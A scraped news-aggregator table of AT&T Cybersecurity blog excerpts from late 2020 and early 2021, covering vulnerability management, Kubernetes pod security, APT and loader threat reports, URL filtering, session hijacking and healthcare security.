What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2021-01-19 11:00:00 | We are better together: AT&T USM Anywhere and Digital Defense Frontline (lien direct) |
An enterprise needs an evolving view of its environment. What does normal look like? What are the weak spots? What is the impact of the threat to your environment?
Detecting the threat after collecting the right data is the first step. From there, the impact of the threat really matters; otherwise, security teams may be chasing after too many issues.
Recently, we have taken a major step in this customer-driven journey by releasing our first Advanced AlienApp that tightly integrates asset, vulnerability and threat data. Our new Advanced AlienApp for Digital Defense includes Digital Defense Frontline Vulnerability Manager (Frontline VM™) and Frontline Advanced Threat Sweep (Frontline ATS™). Joining our suite of existing Advanced AlienApps, Frontline is the first Alien App to offer additional asset discovery, correlation and de-duplication of dynamic assets, on-demand vulnerability scanning, passive malware detection and security risk trend analysis and reporting.
USM Anywhere with the AlienApp for Frontline also provides orchestration actions to help streamline incident response activities and to get even deeper visibility into the assets on the network and their respective vulnerabilities.
Digital Defense Frontline
The Frontline platform is a multi-tenant, cloud-native SaaS platform that supports both agent and agent-less scanning of assets through advanced fingerprinting, which leads to a lightweight customized scan that is often used for on-demand and real-time scanning of assets with minimal performance impact. More importantly, Frontline’s highly customized scanning means a false positive rate |
Malware Vulnerability Threat Patching Guideline | ||
|
2021-01-18 11:00:00 | 5 New cybersecurity threats and challenges facing the financial services sector (lien direct) | This blog was written by an independent guest blogger. It’s been a mixed year for the financial services sector. Some companies have seen increased demand for their services, while others have struggled to deal with the downturn in mortgage deals and reduced consumer spending. At a more granular level, many financial services companies have also had to deal with new ways of work, including putting in place virtual CISOs and scrambling to protect remote workers from increased levels of cyber threats. It’s worth recognizing, however, that very few of the threats that remote employees face are completely new. In fact, most of the challenges facing the sector – and particularly the increased complexity of supply chains and consumer networks – have been around for at least a decade. Still, as 2020 draws to a close, it’s a good moment to cast an eye over the threat landscape that financial services companies find themselves in, and to highlight the key challenges on the road ahead. In this article, we’ll do just that. 1. Misinformation and trust This year saw several newspapers in the US, including The New York Times, launch new initiatives to track viral misinformation. While most of this misinformation was focused on ostensibly political opponents, it also appears to have had an effect on confidence in financial services. Not only is this a business challenge for established financial services companies, it also creates real cybersecurity challenges for them. One of these is... 2. Complex supply chains Perhaps the biggest of these challenges is the fact that the increasing complexity of the financial services sector offers a larger attack surface for hackers and malware. Customers are increasingly keen to manage their finances via an interconnected network of traditional banking tools and novel accountancy apps. Any personal accounting software consumers use to track their finances should come PCI DSS compliant to ensure that their financial data is stored encrypted in a secured environment, and thus reduce the odds of them falling victim to a cyberattack. This approach might provide added convenience and security for businesses and consumers alike, but it’s also not enough. To be more specific, financial services organizations will need to focus on protecting remote endpoints in order to deal with the increased number of potentially exposed endpoints. This includes developing inventories of assets and software, running patch detection and vulnerability scannings to locate issues, and then an automated remediation validation phase to ensure that any patches or configuration changes used to fix the vulnerability were effective. 3. Credential and identity theft Though the financial services sector has had to deal with the consequences of identity theft for years now, 2020 was the year that identity and credential theft exploded. Early analyses show that during the pandemic, the rate of identity theft increased significantly. This increase has come despite increased consumer awareness of the risks of identity theft, and shows that awareness of these dangers is not enough. Consumers know that they should be careful to protect their data, but also lack the expert knowledge necessary to protect every aspect of their online lives. For the financial services sector, this | Ransomware Vulnerability Threat | ||
|
2021-01-14 11:00:00 | Security context: The starting point for how Kubernetes Pod security works (lien direct) | This blog was written by an independent guest blogger. Organizations are increasingly adopting Kubernetes to manage their containerized workloads and services, but Kubernetes security incidents are on the rise, as well. In the fall 2020 edition of the “State of Container and Kubernetes Security” report, for instance, 91% of respondents told StackRox that they had recently adopted Kubernetes. Three quarters of survey participants went on to reveal that they had deployed the container orchestration platform in their production environments. Even so, nine out of 10 respondents told the company that their organizations had suffered a security incident in their container and Kubernetes environments over the last 12 months. Subsequently, nearly half (44%) of respondents said that they had delayed moving an application into production due to their security concerns. These findings highlight the need for organizations to strengthen their Kubernetes security. They can do this by focusing on the security of their pods. StackRox explains why in a blog post: Securing pods, and the containers that run as part of them, is a critical aspect of protecting your Kubernetes environments. Among other reasons, pods and containers are the individual units of compute that are ultimately subject to adversarial techniques that may be used as part of any attack on your Kubernetes clusters. Since pods are also the smallest resource you can deploy and manage in Kubernetes, applying security at this level ensures greater fine-grained controls that are scoped to individual application components. Organizations can specifically use Pod Security Policies (PSPs) to strengthen their pod security. Before that even happens, they need to figure out what they want to define within those PSPs. That’s where security context comes into play. What are security contexts? According to Kubernetes’ documentation, security contexts define the privileges and access control settings for a selected pod or container. These settings include Linux Capabilities through which users can specify whether to give a process some privileges but not those of a root user. They also include AllowPrivilegeEscalation, or controls through which users can make a process more privileged than its parent process. Additional examples of security contexts are available here. To set up security contexts, users need to have a Kubernetes cluster and the kubectl command-line tool configured to communicate with that cluster. They can then include the “securityContext” field in the specification for their pod or container. This action applies whatever security settings they want to their selected resource. Moving on with Pod Security Policies Once they know the security context, organizations can create a Pod Security Policy. Kubernetes notes elsewhere on its website that a PSP functions as a cluster-level resource that defines the security conditions under which a pod is allowed to run. Such a policy encapsulates and enforces one or more security contexts chosen by the user. | Uber | ||
|
2021-01-13 11:00:00 | A Global Perspective of the SideWinder APT (lien direct) |
AT&T Alien Labs has conducted an investigation on the adversary group publicly known as SideWinder in order to historically document its highly active campaigns and identify a more complete picture of targets, motivations, and objectives. Through our investigation, we have uncovered a collection of activity targeting government and business throughout South Asia and East Asia spanning many years. Our findings are primarily focused on activity since 2017, however the group has been reportedly operating since at least 2012.
Alien Labs along with other security researchers have assessed with low to medium confidence that the group is operates in support of India political interests based on targets, campaign timelines, technical characteristics of command and control (C2) infrastructure and malware, association with other known India interest APTs, in addition to past cyber threat intelligence reporting and our private telemetry.
SideWinder is a highly active adversary primarily making use of email spear phishing, document exploitation, and DLL Side Loading techniques to evade detection and to deliver targeted implants. The adversary activity remains at a consistent rate and AT&T Alien Labs recommends the deployment of detections and retrospective analysis of shared indicators of compromise (IOCs) for past undetected activity. In this report we are providing a timeline of known campaigns and their associated IOCs, in addition to a large number of campaigns/IOCs which have not been previously reported or publicly identified.
Full reports and IOCs are available here.
      |
Threat | APT-C-17 | |
|
2021-01-13 06:01:00 | What is a vulnerability management program and should your business have one? (lien direct) | This blog was written by a third party author. The rapid rate of change in attack methods and techniques in today’s cybersecurity landscape has made the keeping of an environment secure increasingly more difficult, causing many to fall into a dangerous state of simply reacting to current threats. Organizations that are serious about the state of their cybersecurity readiness are seeking to proactively look for those vulnerable applications, operating systems, and platforms within the network environment that cybercriminals would otherwise exploit to gain access, elevate privilege, laterally move, establish persistence, and carry out actions to a malicious end. One tenet of a comprehensive proactive security strategy is that of vulnerability management. Vulnerability management is commonly defined as “the practice of identifying, classifying, remediating and mitigating vulnerabilities.” Unlike patching based on security thresholds such as Common Vulnerability Scoring System (CVSS), vulnerability management is a continual process that seeks to intelligently prioritize the response to daily identified vulnerabilities before an attacker attempts to exploit them, keeping the organization as secure as possible. What is a Vulnerability Management Program? A Vulnerability Management Program is a risk-based, established continuous process within the organization designed to address the need to identify and remediate vulnerabilities. It leverages a team of members spanning across multiple departments including security, IT, AppSec, and DevOps; tools such as asset management, vulnerability scanning, and vulnerability assessment solutions, as well as a means to update the potentially wide range of disparate operating systems, applications, appliances, and devices involved. The pillars of vulnerability management A Vulnerability Management Program generally consists of just four basic pillars: Discovery – Having an understanding of every potential source of vulnerability including laptops, desktops, servers, firewalls, networking devices, printers, and more serves as the foundation for any solid Vulnerability Management Program. Identification – Using a vulnerability scanning solution, those systems and devices under management are scanned, looking for known vulnerabilities and correlating scan findings with said vulnerabilities. Reporting / prioritization – This step is a bit more complex than I’m going to cover here. Keeping in mind that you may have thousands of potential vulnerabilities (depending on the size and complexity of your environment), there will no doubt be varying factors that will determine which discovered vulnerabilities take priority over others. But in this step, those on the Vulnerability Management Program team will need to assess the identified vulnerabilities and determine priority. Response/remediation – It should be noted first that the remediation step isn’t always “patch it.” In some cases, there isn’t a patch and so the remediation actions utilize some kind of compensating control. Part of the process of remediating involves re-testing – whether via another vulnerability scan or penetration test. A framework for building a program in-house Providing you have ample staffing and internal expertise, it is possible to implement a Vulnerability Management Program in-house. As previously implied, it will take a team of folks who are responsible for the various parts of the organization that are impacted by both vulnerability scans and the resultant patching and/or remediation. Building a framework is also going to take some dedicated time to build, test, and adjust to meet your organization’s specific needs. A myriad of software solutions will be needed (whose list will be influenced by your industry/vertical’s individ | Vulnerability Patching | ||
|
2021-01-12 11:00:00 | Why cybersecurity awareness is a team sport (lien direct) |
Image Source
This blog was written by an independent guest blogger.
Cybersecurity may be different based on a person's viewpoint. One may want to simply protect and secure their social media accounts from hackers, and that would be the definition of what cybersecurity is to them. On the other hand, a small business owner may want to protect and secure credit card information gathered from their point-of-sale registers and that is what they define as cybersecurity.
Despite differences in implementation, at its core, cybersecurity pertains to the mitigation of potential intrusion of unauthorized persons into your system(s). It should encompass all aspects of one’s digital experience--whether you are an individual user or a company.
Your cyber protection needs to cover your online platforms, devices, servers, and even your cloud storage. Any unprotected area of your digital journey can serve as an exploit point for hackers and cyber criminals intent on finding vulnerabilities.
People assume that it is the responsibility of the IT Department to stop any intrusion. That may be true up to a certain point, cybersecurity responsibility rests with everyone, in reality.
Cybersecurity should be everybody’s business.
The cybersecurity landscape is changing. With 68% of businesses saying that their cybersecurity risks have increased, it is no wonder that businesses have been making increased efforts to protect from, and mitigate attacks.
During the height of the pandemic, about 46% of the workforce shifted to working from home. We saw a surge in cybersecurity attacks - for example, RDP brute-force attacks increased by 400% around the same time.
This is why cybersecurity must be and should be everybody’s business. According to the 2019 Cost of Cybercrime Study, cyberattacks often are successful due to employees willingly participating as an internal actors or or employees and affiliates carelessly clicking a link by accident.
Sadly, it is still happening today. Unsuspecting employees can be caught vulnerable and cause a corporate-wide cyberattack by opening a phishing email or bringing risks into the company’s network in a BYOD (Bring Your Own Device) system.
Just a decade ago, Yahoo experienced a series of major data breaches, via a backdoor to their network system established by a hacker (or a group of hackers). Further digital forensic investigation shows the breach started from a phishing email opened by an employee.
Another example was Equifax when it experienced a data breach in 2017 and was liable for fines amounting to $425 million by the Federal Trade Commission (FTC).
Companies continue to double up on their investments in cybersecurity and privacy protection today to ensure that incidents like these do not happen to their own networks. But a network is only as strong as its weakest link. Hackers continue to innovate, making their attacks more and mo |
Ransomware Data Breach Malware Vulnerability Guideline | Equifax Equifax Yahoo Yahoo | |
|
2021-01-11 11:00:00 | Why are cybercriminals suddenly targeting maritime infrastructure? (lien direct) | This blog was written by an independent guest blogger. If you were asked to list out the top problems society has been facing in 2020, cyberattacks on the maritime industry might not be an obvious issue that would come to mind. But the industry has seen a worrying trend in recent months, as a spike in cyberattacks that has left some of the biggest companies in the industry exposed. Specifically, both the fourth largest global shopping company and the International Maritime Organization (IMO) have been targeted in these attacks. And while shipping companies might seem like an obscure target for hackers, in reality these attacks can tell us a lot about emerging trends in cybersecurity in general. In this article, we’ll take a deeper look at these recent attacks, and what they can tell us about new threats we are likely to face in the years to come. A new type of cyberattack At first glance, the fact that maritime cyber attacks have increased by 900% in three years might seem strange. Shipping companies have, after all, been around for centuries. Why the sudden spike? There are a number of factors at play – some technical, and some political. First, the political. Back in May, with the pandemic raging and the first lockdown orders being put in place, you may have missed a very important piece of news. That month, Israel and Iran traded cyberattacks in a way that caught the attention of many analysts. This was because these attacks were unusually open, and seemed to indicate an increased willingness for states to attack not just their opponents’ military systems, but in an attempt to cause economic disruption as well. Specifically, on May 9th of this year hackers went after the Shahid Rajaee Port’s computer systems near the Strait of Hormuz, which is the busiest harbor in Iran for maritime trade. In this new world, it seems that ports, ships, and shipping companies have become a favorite target of cybercriminals. Some of these criminals are state-sponsored, with a corresponding level of technical support and resources. Vulnerabilities Looked at another way, the increase in attacks against maritime companies can | |||
|
2021-01-07 11:00:00 | Malware using new Ezuri memory loader (lien direct) |
This blog was written by Ofer Caspi and Fernando Martinez of AT&T Alien Labs
Multiple threat actors have recently started using a Go language (Golang) tool to act as a packer and avoid Antivirus detection. Additionally, the Ezuri memory loader tool acts as a malware loader and executes its payload in memory, without writing the file to disk. While this technique is known and commonly used by Windows malware, it is less popular in Linux environments.
The loader decrypts the malicious malware and executes it using memfd create (as described in this blog in 2018). When creating a process, the system returns a file descriptor to an anonymous file in '/proc/PID/fd/' which is visible only in the filesystem.
Figure 1 shows a code snippet from the loader, containing the information it uses in order to decrypt the payload using the AES algorithm.
Figure 1. Loader code snippet via Alien Labs analysis.
The loader, written in Golang, is taken from the "Ezuri" code on GitHub via the user guitmz. This user originally created the ELF loader around March 2019, when he wrote a blog about the technique to run ELF executables from memory and shared the loader on his github. Additionally, a similar user ‘TMZ’ (presumably associated with the previously mentioned ‘guitmz’) posted this same code in late August, on a small forum where malware samples are shared.
The guitmz user even ran tests against VirusTotal to prove the efficiency of the code, uploading a detected Linux.Cephei sample (35308b8b770d2d4f78299262f595a0769e55152cb432d0efc42292db01609a18) with 30/61 AV detections in VirusTotal, compared to the zero AV detections by the same sample hidden with the Ezuri code (ddbb714157f2ef91c1ec350cdf1d1f545290967f61491404c81b4e6e52f5c41f).
|
Malware Tool Threat | ||
|
2021-01-07 06:01:00 | What is URL filtering? Web filtering explained (lien direct) | This blog was written by a third party author. What is URL filtering? URL filtering is one of the most common types of web filtering techniques used by organizations to restrict the kinds of content that their users may access. URL filtering blocks users from loading questionable websites or hosted files via corporate device or network resources. The filter is triggered by comparing the URL address a user is trying to access against policy lists that specify whether to block, allow, and/or track visits to certain URL addresses. The URL filtering process occurs at the application layer by examining URL requests over common protocols like HTTP/HTTPS, FTP, and SMTP. Malicious, time-wasting, or otherwise questionable URL addresses can be filtered on a page-by-page basis as well as on a category basis to broadly block access to certain kinds of content such as gambling, social media, or known phishing sites. The known malicious URLs and category definitions in a URL filtering database are primarily maintained by the security vendor supplying the enforcement product. URL classification is typically performed by the vendor through a combination of internal research, threat intelligence, machine learning, and artificial intelligence algorithms. In addition, the URL filtering database and enforcement policy lists are often highly customizable by the customer. That customization can be done across an organization or be tailored to departments, user groups, or even specific users. Similarly, filtering policies could be applied according to time of day or user location. This makes it possible, for instance, to block cloud storage sites for employees except for the sales team who might need them to share information with prospects. Or it could be used to enable remote access by a financial analyst to certain cloud-based accounting software during business hours, but to limit that access after close of business. Web filtering use cases and benefits Web filtering techniques like URL filtering are best known for their cybersecurity use cases, however they provide additional benefits in a number of other business scenarios. The following are 4 of the most common uses of URL filtering and other content filtering methods: Blocking malicious activity URL filtering is most commonly used to block malicious websites and hosted files associated with known phishing campaigns, malware propagation, and other cybercriminal activity. Enforcing NSFW corporate policy Organizations can utilize URL filters to restrict access to not safe for work content that runs afield of corporate policies, such as pornography or gambling sites—many of which are also conduits for cybersecurity threats. Promoting employee efficiency Many businesses take advantage of the additional benefits of URL filtering by utilizing the capabilities to limit employee access to distracting content in categories like shopping, news, and social media sites. Minimizing bandwidth strain In addition to reducing distraction from non-work related content, URL filtering can also minimize the use of bandwidth hogging applications such as video streaming and online gaming sites. URL filtering vs DNS filtering URL filtering is a more granular form of web filtering than DNS filtering, which blocks or allows content across entire web domains based on DNS queries. DNS filtering takes more of a blunt hammer approach to blocking sites. It is most appropriate for filtering out whole domains associated with highly malicious activity that have little chance of hosting legitimate content. Meantime, URL filtering takes more of a scalpel approach, allowing organizations to block certain specific web pages or hosted files from a given domain while allowing users unimpeded access to other legitimate pages hosted on | Malware Threat | ||
|
2021-01-06 11:00:00 | IoT Cybersecurity Act successfully signed into law (lien direct) | This blog was written by an independent guest blogger. The IoT Cybersecurity Act, which aims to reduce the supply chain risk to the federal government arising from vulnerable IoT devices, was recently passed into law, and its effects are expected to carry over into private enterprise. Critics felt the law was long overdue: as found in the Nokia Threat Intelligence Report 2020, IoT devices are now responsible for 32.72% of all infections observed in mobile networks, representing an increase of 16.55% since 2019 alone. What threats can the rapid proliferation of IoT devices cause, and how is the new law dealing with them? 2020: A year of unprecedented cyber attacks 2020 has demonstrated the extent to which cyber criminals can quickly take advantage of major changes and crises taking place in the world. In a recent report, Fortinet warns that the introduction of edge devices will provide attackers with even more opportunity to wreak havoc via advanced threats. Over the past few years, traditional networks have been replaced with multiple-edge environments, IoT, WAN, remote center, and more. Fortinet adds that “while all of these edges are interconnected many organizations have sacrificed centralized visibility and unified control in favor of performance and digital transformation.” Cyber criminals will be harnessing the speed and scale that 5G will enable to target these environments at a more profound level. Main threats to security posed by connectivity Some of the biggest threats to cyber security include trojans seeking to target the edge, edge-enabled swarm attacks, smarter social engineering, and the possibility of ransoming OT edges. In the case of everyday users, the practical implications are endless. For instance, in the case of social engineering, attackers can use important contextual information about users’ daily routines and financial information to ransom, extort, and ca | Ransomware Threat Patching | ||
|
2021-01-05 11:00:00 | Calm in the COVID storm: AT&T Cybersecurity (lien direct) | We’ve been busy at AT&T Cybersecurity during the pandemic. Turns out we could help out our network customers in so many ways. Here are some examples: Helping enable remote learning Many schools closed their doors in Spring 2020, when COVID-19 cases began to spike within the U.S. and quickly transitioned to a distance learning model. While this move was necessary to protect the health of students and faculty, it left many low-income families in a position to figure out how they could connect their children to their school’s virtual classrooms when they had no internet service at home. AT&T worked with popular sports team, the San Antonio Spurs, to offer free and highly secure wireless internet to families from the AT&T Center parking lot. The Spurs managed the physical solution via Aruba Networks provided wireless access points, while AT&T provided the 1GbE internet circuit at no cost. And while access is critical to remote learning, it’s also important that students’ ability to participate in class isn’t hampered by issues that could cripple their device, such as malware. So, to protect students from threats that they may encounter online, AT&T Cybersecurity’s Global Security Gateway service was also deployed free of charge. Preserving business continuity Organizations are relying more than ever on their network connections to support their remote workers and to process e-commerce transactions. Bad actors have identified this dependence as a prime opportunity to strike and make some quick cash. Over the past couple of months, there have been global DDoS extortion campaigns that began with targeting businesses within financial services sectors but has since expanded to include many other industries. Victims of this campaign have received letters demanding payment of 20 Bitcoin on average (approximately US $227,000), to avoid large volume DDoS attacks. The AT&T Cybersecurity Threat Operations Center has been monitoring the network traffic 24x7 for customers that subscribe to the AT&T DDoS Defense service to identify and mitigate attacks but also assisting many non-subscribing customers with emergency mitigation services. In these instances, AT&T redirected the network of affected organizations to its scrubbing centers to block the malicious traffic, while letting legitimate transactions to flow unimpeded, allowing business to resume without paying these inflated ransom demands. Detecting threats before they impact your business One thing that hasn’t slowed down during this pandemic is cybercrime. Cybercriminals are taking advantage of the fear and uncertainty surrounding the current global health and economic situation as well as sudden shifts and exposures in IT environments to launch attack campaigns. The FBI recently reported that cyberattacks are up to around 4,000 incidents per day. With this increase in attacks, organizations need visibility and continuous monitoring of their entire environment to help detect and respond to threats before their business is impacted. The AT&T Managed Threat Detection and Response analyst team has been monitoring customer environments 24x7 for signs of potential threats and documenting investigations. For examples, checkout the blog series: Stories from the SOC. The team has been able | Malware Threat Guideline | ||
|
2021-01-05 06:01:00 | What is a software-defined perimeter and how does SDP work? (lien direct) | This blog was written by a third party author. What is a software-defined perimeter? A software defined perimeter (SDP) establishes virtual boundaries around Internet-connected assets and user activity through an integrated security architecture approach. SDP works regardless of whether assets reside on-premises or in the cloud, or whether users are on-site or working remote. Rather than relying on hardware like firewalls or VPNs at the network boundary, SDP leverages software to prevent any access to or even visibility into resources within the virtual perimeter by default. This deny-all approach only grants access through robust, mutual authentication of authorized users and validated devices attempting connection. Internet-connected resources protected by the SDP architecture remain otherwise hidden to everyone (and everything) else. Organizations have historically used firewalls not only at the boundary of the network but also to segment off a limited number of sensitive areas for higher levels of protection. But those segments are typically very broad. SDP makes it possible to take the principle of least privilege to its logical conclusion through much more tightly defined micro segmentation of resources. SDP gates access on a 1-to-1 connection basis rather than an IP basis to account for the broad distribution of assets in cloud environments. This means that SDP access is granted to specific resources rather than a network at large. While it might still be wise to use firewalls for internal segmentation to limit the reach of malware, SDP technology supplants many of its traditional protection benefits. What security technologies are considered SDP? While there are standalone SDP platforms on the market, SDP is more of an architectural model than a single security product, as it wraps in technology like multi-factor authentication, encryption, network gateways and more. As the Cloud Security Alliance recently explained in its Software-Defined Perimeter Architecture Guide, SDP architectures are designed to build in five layers of security at a minimum: Authentication and validation of devices Authentication and authorization of users Two-way encrypted communications Dynamic provisioning of connections Control over connections to services while keeping them hidden The hallmark of the SDP architecture is that it separates the access control plane from the data plane, typically through user-aware applications, client-aware devices, and network-aware firewalls and gateways. The nerve center of the SDP technical stack is the software-based SDP controller, which supports authorization and authentication services, encryption technology, context-aware technology like geolocation, centralizes policies, and handles communication with SDP clients and gateways. Connection attempts are not made directly from an initiating host (typically the client) to the controller, but instead is routed through to an accepting host (typically the gateway), which interfaces with the controller to determine if the accepting host can establish two-way encrypted connection with the initiating host. Both the controller and the accepting host are protected by single-packet authorization (SPA), which is what keeps them hidden to unauthorized users and devices. Comparing SDP to traditional VPN One of the big advantages of SDP is that it offers the same user experience for those accessing resources remotely as it does for users within the confines of the office. And usually, it does it more securely than VPN in the process. VPNs are designed to provide an encrypted communication tunnel through traditionally firewalled network boundaries to access on-premises resources. But they're a notorious performance chokepoint for remote users, especially when tapping into | |||
|
2020-12-22 11:00:00 | \'Tis the season for session hijacking - Here\'s how to stop it (lien direct) | This blog was written by an independent guest blogger. The air is getting colder, leaves are falling from the trees, and people everywhere are settling in for the holiday season. Which means one thing - increased cybersecurity vulnerability. With more aspects of the winter holidays relegated to online platforms this year, people everywhere are more susceptible to cyberattacks. Luckily, there are plenty of simple steps you can take to protect yourself from digital threats and online scams. But there is one particularly nefarious type of cyberattack that you might not be aware of. This is session hijacking. In this article, we will take a look at what session hijacking is, how the holidays make you extra vulnerable to this type of attack, and how to prevent it from happening to you. What is Session Hijacking? Let’s start with the terms. A session is the period of time when a user is actively accessing an application, website, or other online service. Each user session begins when you log into a website or app and ends when you log out of it. For example, when you type your username and password into a banking application, that begins your session on that online application. When you log into an online application, the server typically generates a temporary session cookie in your browser. This cookie tells your browser that you are logged in and have been authenticated on the server. Each temporary session cookie is marked by a unique session ID, or key. If a hacker is able to access your unique session ID, they can access your session. Session hijacking, also called “cookie hijacking”, can follow several patterns. One method, cross-site scripting, or XSS, essentially works like this. An attacker implants a script into the web server the victim is trying to access. The victim then authenticates their presence on the tampered-with server, creating a unique session ID that includes the attacker’s script. The server returns the page code with the attacker’s script to the victim, whose own browser enacts the script, sending the victim’s unique session cookie to the attacker. The attacker is then granted access to the user’s session, meaning they can witness any interaction taking place there and steal any sensitive information revealed in the session. Malvertising is another current “hot” technique that induces a victim to click on an ad infected with malicious code that snags the session ID, thus granting the hacker access to the victim’s unique session key. Here again, the victim is authenticated on the server and the hacker can hijack the victim’s session. All the attacker has to do is input the victim’s session ID on their own browser, tricking the server into reading the hacker’s browser connection as the victim’s already authenticated session. Holidays under threat The coronavirus pandemic has had many wide-ranging effects on all of us. One result of this global situation is the massive increase in cybersecurity vulnerability. Studies have shown precipitous rises in spam attempts, as opportunistic hackers seek to prey on widespread uncertainty. But the pandemic places cybersecurity at risk on another level as well. This year, the holidays have gone digital to an extent never seen bef | Spam Studies | ||
|
2020-12-18 11:00:00 | \'Twas the night before InfoSec (lien direct) |
This blog was written by an independent guest blogger.
‘Twas the night before Christmas, and fresh off the LAN
The packets were coming fast out of the span.
My wireshark was up with my templates in place,
In hopes that I’d find an IP I could trace.
The smart home was snug in its /28
With a meager allow-list, and a lock on the gate.
With a few hours to setup and wrap this year’s catches
I’d been charging them up, and applying their patches,
When down in the VLAN there’d been such a spike
I’d opened the logs to see what it looked like.
Away to the dashboard I stumbled and flew;
Most days I’m on Red, but tonight, I was Blue.
The DST in the headers was a weird bogon range.
“Two oh three... zero? You can’t route there... how strange.”
When what, to my wondering eyes, should come back
But a TCP handshake -- not a RST, but an ACK!
A cool sweaty IR-like calm to me came,
As the nightmares and malwares, I ruled out by name:
“The SPIDERs and PANDAs don’t care about me,
It’s not running Windows, so it’s not IcedID…
Not Trickbot, not Ryuk, not Buer or Clop,
Not Scarab or Locky, no second-stage drop.”
A session had opened on port 443,
And a download began - not one started by me.
I looked back to ensure that the capture was on,
And stood by to cut comms once the vandal was gone.
But the session closed up just as fast as it came
And the download just sat there - “GIFT.BIN” was its name.
I’d retrieved a live sample! And without any warning,
Had got something fun to unwrap Christmas morning.
I checked on the rulesets, configs, and permissions,
And rebooted each box for the sake of tradition.
I waited for more but there wasn’t a peep,
So I finished my wrapping and popped off to sleep.
And after the coffee and presents and nog,
The matching pajamas, the pickle, the grog,
Video calls with our family and friends,
Things had settled, so I went to tie up the loose ends.
I ran strings right away and my jaw opened wide,
For there, unencrypted, a message I spied:
“2020’s been awful, with so much that you’ve missed
Just to keep others healthy - so you made the Good List!
And like all of your friends, I have had to stay distant,
But your record’s been stellar, so the elves were insistent.
You already have surplus gadgets that light up
So I got you this PoC, and a CVE writeup.
The binary is an iPhone zero-day,
And I’ve left enough out that you’ll have room to play.
And once you’ve dissected and filled in the blanks,
And disclosed it responsibly, you can cash in my thanks!
Thanks for staying inside this year, hunkering down,
Thanks for wearing your mask, though you felt like a clown,
Thanks for not hoarding groceries, and for learning to cook,
Or for trying a language, or reading a book.
And following rules from your state and your county.
Now warm up your debugger, and cash in that bounty!”
|
|||
|
2020-12-18 06:01:00 | What is next gen antivirus? NGAV explained (lien direct) | This blog was written by a third party author. What is next gen antivirus (NGAV) and how does it work? In contrast to legacy antivirus technology, next generation antivirus (NGAV) advances threat detection on the endpoint by finding all symptoms of malicious behavior across an endpoint system rather than fixating on looking for known malware file attributes. NGAV uses artificial intelligence (AI) and machine learning algorithms to examine files, processes, applications, network activity, and user behavior to identify atypical activity that could indicate malicious attacks are unfolding on the endpoint. The AI that NGAV depends upon is constantly learning from historical and ongoing system behavior to develop baselines for what 'normal' looks like on a given activity. These baselines can then be used to compare real-time activity. The predictive analytics get better over time at pinpointing anomalies that are likely to track to malicious behavior. This approach makes it possible to block new attack techniques in real-time, before they've ever been identified and catalogued by security researchers. Comparing NGAV vs. legacy antivirus NGAV development progressed in response to the shortcomings on traditional file-based signatures and heuristics, which depend upon previous knowledge about malware characteristics and behaviors to flag potential infections. Attackers learned a long time ago how to evade such signature-based detection methods by creating polymorphic malware and otherwise changing up attributes of their malware on a consistent basis so that the life of a malware signature is so short as to make it ineffective nearly instantly. According to recent figures, some 70% of all malware attacks today involve zero-day malware that evade signature detection with previously undocumented characteristics or behaviors. NGAV picks up on emerging threats like these because it doesn't require creating complicated rule sets in advance of the attack. Instead, it seeks out differences between the activity and the baseline to spot new behavior that's suspicious because it is outside the norm. Additionally, cybercriminals also increasingly utilize fileless attack techniques to avoid leaving tracks that could be detected through signatures. This includes utilizing macros, scripting engines and platforms like PowerShell, in-memory attacks, and other 'living off the land' attacks that don't require dropping files to carry out malicious ends. According to a recent analysis, the most common critical-severity cybersecurity threat to endpoints was fileless malware, followed closely by dual-use PowerShell tools that are used in exploitation and post-exploitation behavior. All told, those make up 54% of threat tactics, compared to traditional malware like worms, banking trojans, and remote access tools (RATs), which all together only comprised 14% of tactics. Utilizing NGAV makes it possible to pick up on behavior from fileless attacks since it is not tied just to what the malware drops on the system, but instead keeps tabs on how the entire system is working. Why NGAV matters to cybersecurity programs According to Ponemon Institute, the average economic loss of a single endpoint breach now adds up to $8.94 million. More than five in 10 organizations say that their endpoint security solutions can't detect advanced attacks—respondents estimate that their legacy AV products miss an average of 60% of attacks. Respondents are also increasingly unsatisfied with traditional antivirus not only for what they don't detect, | Malware Threat | ||
|
2020-12-16 11:00:00 | 2021 Cybersecurity in healthcare (lien direct) | Breaches and cyberattacks are on the rise in the healthcare industry. The recent acceleration of digital technology and connectivity within Healthcare has led to significant patient care delivery improvements, more effective population health management, and better patient outcomes. With this increased technology and connectivity, however, comes increased exposure to cyberattacks that can impact patient care delivery, safety, and privacy. Cybersecurity Ventures predicts that Healthcare will suffer 2-3X more cyberattacks in 2021 than the average amount for other industries. Woefully inadequate security practices, weak and shared passwords, and vulnerabilities in code expose hospitals to perpetrators intent on hacking treasure troves of patient data. Ransomware attacks on healthcare organizations were predicted to quadruple between 2017 and 2020 and will grow to 5X by 2021, according to a report from Cybersecurity Ventures. The Secretary of U.S. Department of Health and Human Services (HHS) Breach of Unsecured Protected Health Information lists 592 breaches of unsecured protected health information affecting 500 or more individuals within the last 24 months are currently under investigation by the Office for Civil Rights. Three hundred six of the breaches were submitted in 2020. HIMSS 2020 Survey findings: A broad attack surface exists within many healthcare organizations due to the profound lack of resources. Relatively few healthcare organizations are conducting end-to-end security risk assessments. Many risks are unaddressed due to the lack of comprehensive security risk assessments. Furthermore, the legacy system footprint is growing within many healthcare organizations. Sensitive information is exposed, and such systems are vulnerable to attack. Diagnosis, prognosis and a prescription to help cure Diagnosis: Healthcare data valuable in the black market Connected medical devices vulnerable Medical data availability is as vital as Confidentiality, Integrity Business Associates and Security Risk (Supply chain) Compliance regulations scrutiny Legacy systems (still uses end of life OS) Prognosis: Threat intelligence information on Healthcare Future of telehealth in Healthcare Post COVID threat landscape shift Prescription for cure Proactive best practices Lessons learned based on current diagnosis Digital risk management in Healthcare Prescription to help cure: Verify that data is backed up frequently. Frequently test restore procedures on randomly selected files. Review the threat surface regularly or each time a system is implemented. Require strong, complex passwords and change them at regular intervals. Use only authorized software on the enterprise network environment. Use the “Principle of Least Privilege” approach to user accounts and data access. Establish controlled entry points for a remote netwo | Threat | ||
|
